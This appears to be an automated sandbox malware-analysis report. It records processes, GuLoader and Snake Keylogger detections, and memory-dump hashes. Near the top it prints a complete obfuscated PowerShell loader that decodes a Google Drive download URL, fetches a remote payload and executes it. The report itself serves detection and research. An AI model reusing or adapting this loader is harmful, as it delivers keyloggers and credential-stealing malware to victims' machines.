                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
                                                                Imagebase:0xbe0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2184830111.0000000008800000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2169361700.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2185161641.000000000B0D5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:02:42:41
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff72bec0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:02:43:04
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0xf70000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2988377794.00000000243C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1964645012.00007FFD9BB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9bb00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ab2f49bc6e6da1f6509690c4edbe70215c5bc74532494fc1eb67222afc586a9
                                                                  • Instruction ID: a0a1b3a563fcb2fe772de5d7b6d486f79107df37638781b91d6caa45e05ef0ad
                                                                  • Opcode Fuzzy Hash: 5ab2f49bc6e6da1f6509690c4edbe70215c5bc74532494fc1eb67222afc586a9
                                                                  • Instruction Fuzzy Hash: 91026822A0EBC90FE766976848655B87BE1EF56624F4901FFD09CCB1E7DE18AC05C342
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1959888489.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab21934ff491406c08fe022c48f8b52f8c4b7b21fa91e34ab43e2dc896f3229d
                                                                  • Instruction ID: 8209ff9fa0dba626ed881ffc69f3bc7307cda783749db4f849e5f58b945f1790
                                                                  • Opcode Fuzzy Hash: ab21934ff491406c08fe022c48f8b52f8c4b7b21fa91e34ab43e2dc896f3229d
                                                                  • Instruction Fuzzy Hash: FBF1C930A09E4D8FEBA8DF28D8557E937D1FF58310F04426EE85DC7295DB3499458B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1959888489.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9438f98bb4f5f2415f3da3df4a9f5dd59e3c9df52c33981fc186e44b358bd39c
                                                                  • Instruction ID: 4334b5a134577d3903100deed40d857ac51efd8fa751b34d64a8f990e2f54e64
                                                                  • Opcode Fuzzy Hash: 9438f98bb4f5f2415f3da3df4a9f5dd59e3c9df52c33981fc186e44b358bd39c
                                                                  • Instruction Fuzzy Hash: 30E1D430A09E4E8FEBA8DF68C8557E977E1FF58310F04426EE81DC7295DE74A9418B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1959888489.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a976f23924104d85114f85e8dfb2a4b7f844ab163e69e52af88fdd8657e76a7
                                                                  • Instruction ID: aa3f10c1abb0a63864e1a90843615b3d54fad255b43a6eeddf1557d7c5bfe081
                                                                  • Opcode Fuzzy Hash: 5a976f23924104d85114f85e8dfb2a4b7f844ab163e69e52af88fdd8657e76a7
                                                                  • Instruction Fuzzy Hash: 4BF19330A1DA4D8FDF98DF5CD4A4AA97BE1FF68300F1501AAE45DD7296CA34E841CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1961082626.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78c625498c5cbcc058846b32adb315a00a5478b33862f830e4c1e8da4b8d9139
                                                                  • Instruction ID: 2f6999d805d3e7ff2c96ea1b1fe4c9b4110d7c20594e46210c102955688d4887
                                                                  • Opcode Fuzzy Hash: 78c625498c5cbcc058846b32adb315a00a5478b33862f830e4c1e8da4b8d9139
                                                                  • Instruction Fuzzy Hash: 11D13A21B1FBC91FE7AA97A858756B53BD1EF42210B0901FED89DC72F7DD58A8018341
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1961082626.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a3d8e22f295a8effff45942e2786dc217254ed5fc9279d1b8b9297ca27b240d
                                                                  • Instruction ID: 29b22d6749b8a9f8e4e8c200d94ea5ae8d53731d6a58cf3a6f4c9a3ec5d2aaab
                                                                  • Opcode Fuzzy Hash: 9a3d8e22f295a8effff45942e2786dc217254ed5fc9279d1b8b9297ca27b240d
                                                                  • Instruction Fuzzy Hash: DBC15931B1EA8E1FEBB4EBA858655B97BD1EF55314F0801BEE85DC70E3D91CAA018341
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1959888489.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e05621aa867bba97d229709f5190e63aa5a06e8859f5fb3b3e29e2ccdcd65dd
                                                                  • Instruction ID: bb003ed2890a99e51bfc4f004e53f85fd9f986219a636e2fb15909bc422bf368
                                                                  • Opcode Fuzzy Hash: 0e05621aa867bba97d229709f5190e63aa5a06e8859f5fb3b3e29e2ccdcd65dd
                                                                  • Instruction Fuzzy Hash: A6B1D63060DA8D4FEB69DF28C8557E93BE1EF59310F14426EE85DC7292CB34A945CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1964645012.00007FFD9BB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9bb00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17083aab223c3dab353f0c5542e5ca2a9a97f0c27129b132f4695950859d6562
                                                                  • Instruction ID: 0f611836e799b6ac5b293341ff1852d7311bfa22278cbd042ed7abe6726a7a81
                                                                  • Opcode Fuzzy Hash: 17083aab223c3dab353f0c5542e5ca2a9a97f0c27129b132f4695950859d6562
                                                                  • Instruction Fuzzy Hash: 62514622B0EACD4FEBA2DB6844645B97BE0EF56614B4900FBD09CC71E7DE18AD08C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1961082626.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9849636a5bec23c986a1d0d2bf7e84c1ea18250c8aaef26f7fa119f36799395b
                                                                  • Instruction ID: fb71d03a67c6985f1ad73e3e6f8cb6da7b954439ee9ec2a8b39e8073ddf1f83d
                                                                  • Opcode Fuzzy Hash: 9849636a5bec23c986a1d0d2bf7e84c1ea18250c8aaef26f7fa119f36799395b
                                                                  • Instruction Fuzzy Hash: CD210922B6FA8D1BE3F997A814642B463C1DF95310B5900FED91DC72EBED59AC014201
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1959888489.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 329f5b613c9e911af2a9891822633201756b78514fbb60bd4c81d303cc9b7a25
                                                                  • Instruction ID: 6973abda8178ed021023d7314f6b020a0181bd850d45c01afebc93ae66657ab7
                                                                  • Opcode Fuzzy Hash: 329f5b613c9e911af2a9891822633201756b78514fbb60bd4c81d303cc9b7a25
                                                                  • Instruction Fuzzy Hash: CC312170A1994E8FFBB4EFA4CC1ABF93291FF49319F414139D41D860A6CA786A85CF11
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1961082626.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a9154a8240b867ea93e69d702bc887e9b796963c3ce6e033b905eec390bf758
                                                                  • Instruction ID: 74de05b76af52225b4f526ef2796a691a7b46f45f51b4581185adad1ce60b93e
                                                                  • Opcode Fuzzy Hash: 3a9154a8240b867ea93e69d702bc887e9b796963c3ce6e033b905eec390bf758
                                                                  • Instruction Fuzzy Hash: 94214552F1F7CA1FE361A3B828B41A46BD1DF16658B0900FFC4A9CB1E3D85818058301
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1961082626.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a955158fffbf9b49ce695076e4c00b8ab9686f4ff3c73ff967d5ac65495bfb08
                                                                  • Instruction ID: 019ee9877133ea046016c9dd32d6fd45e886333102754af8a6712566ea4d2439
                                                                  • Opcode Fuzzy Hash: a955158fffbf9b49ce695076e4c00b8ab9686f4ff3c73ff967d5ac65495bfb08
                                                                  • Instruction Fuzzy Hash: 5C11035094E3C11FD313977458B96A53FB15F43204B1E85EFD8C58F0B3D659195AD322
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1959888489.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction ID: f7ebb562445bd6673da893d6cfde51b070fe75054d96b488a2a449a36731dcac
                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction Fuzzy Hash: BD01A73020CB0C4FD748EF0CE451AA5B3E0FB89320F10056DE58AC36A1D632E881CB41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-81657163
                                                                  • Opcode ID: cff8ab68e6d4f6ec6eb178b0e0a65515afb21cf1136549e7110943352a1eefcd
                                                                  • Instruction ID: 57e0cf38b3cc5167d50df41df82276da335ef26bb3c4edfc36fc9adcb5de4ab7
                                                                  • Opcode Fuzzy Hash: cff8ab68e6d4f6ec6eb178b0e0a65515afb21cf1136549e7110943352a1eefcd
                                                                  • Instruction Fuzzy Hash: 2F3207B1B0021B9FCB158A79841966ABBE2AF85321F1C84BAD906DF351DF31DC46C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84!l$84!l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-685555545
                                                                  • Opcode ID: ea903c21d942dfe913d8df7e964377887b41831614bd83e641f2385109c8362c
                                                                  • Instruction ID: 1537580208b69a1d9936e5d387364234599eaa4a774a0e367d6e6fa79abe1eab
                                                                  • Opcode Fuzzy Hash: ea903c21d942dfe913d8df7e964377887b41831614bd83e641f2385109c8362c
                                                                  • Instruction Fuzzy Hash: D022E6B1B042569FCB158F39C828666BBB2BF86211F2CC4ABD546CF352DB31C845C761
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$4'^q$4'^q
                                                                  • API String ID: 0-2199011432
                                                                  • Opcode ID: 746f67e9b4fdadc2f8667531eaa31eb5af8cf3c4f415909628562faaeeeb1053
                                                                  • Instruction ID: 093aa48b381a60ab01061dea06bb07f338661168d9e0968180574740cee504ce
                                                                  • Opcode Fuzzy Hash: 746f67e9b4fdadc2f8667531eaa31eb5af8cf3c4f415909628562faaeeeb1053
                                                                  • Instruction Fuzzy Hash: 5D926DB4A00215DFDB14CB28C945B69BBB2BF85304F58C0A5D94A9B392DF32ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                  • API String ID: 0-1137307227
                                                                  • Opcode ID: ea1a38b10b2fd8b0ec1f03a4117e31c8aa0bace42b2e0dd86e298be77da436b2
                                                                  • Instruction ID: 16f1add8e51410b24508c519f1550aeada61cada6754becb8f8afdea6926b8a6
                                                                  • Opcode Fuzzy Hash: ea1a38b10b2fd8b0ec1f03a4117e31c8aa0bace42b2e0dd86e298be77da436b2
                                                                  • Instruction Fuzzy Hash: BF5260F4A00219DFDB14CF68C855BAABBB2BF84315F1481A9D90A6B355CB31ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$4'^q
                                                                  • API String ID: 0-4124179908
                                                                  • Opcode ID: 750f6af3eb18f17e4173aed1fc62c9633c9d2b2fad5eac7edbde14d6311bde32
                                                                  • Instruction ID: 1c59563ddffaef968081daded0339729d4a3c1a5a257dc5fd251db260ca3db86
                                                                  • Opcode Fuzzy Hash: 750f6af3eb18f17e4173aed1fc62c9633c9d2b2fad5eac7edbde14d6311bde32
                                                                  • Instruction Fuzzy Hash: DA727FB4A00215DFD754CB18C945B69FBB2BF85304F58C0A5E94AAB392CB72ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                  • API String ID: 0-1041444323
                                                                  • Opcode ID: 0d6f818cd34380b257f6795e48159f8d8fbaf8ac7dc39c6c8a55c834c47e8032
                                                                  • Instruction ID: 19855afdf163a21278ae9862d143111be1b662785846b3ca70f41433ba97a05a
                                                                  • Opcode Fuzzy Hash: 0d6f818cd34380b257f6795e48159f8d8fbaf8ac7dc39c6c8a55c834c47e8032
                                                                  • Instruction Fuzzy Hash: 161264B4B00218AFD714CB68C445BADBBF2AF85315F58C069D906AF795CB72EC41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                  • API String ID: 0-2822668367
                                                                  • Opcode ID: 4be2c0776f4211424799a600c7983ec259291c1f3fdd0a2c5273d0cd64ae9e82
                                                                  • Instruction ID: 13d7d9310693a6260b22c24295e1c52e7ab3ae3761d81a218d1ae22340c50165
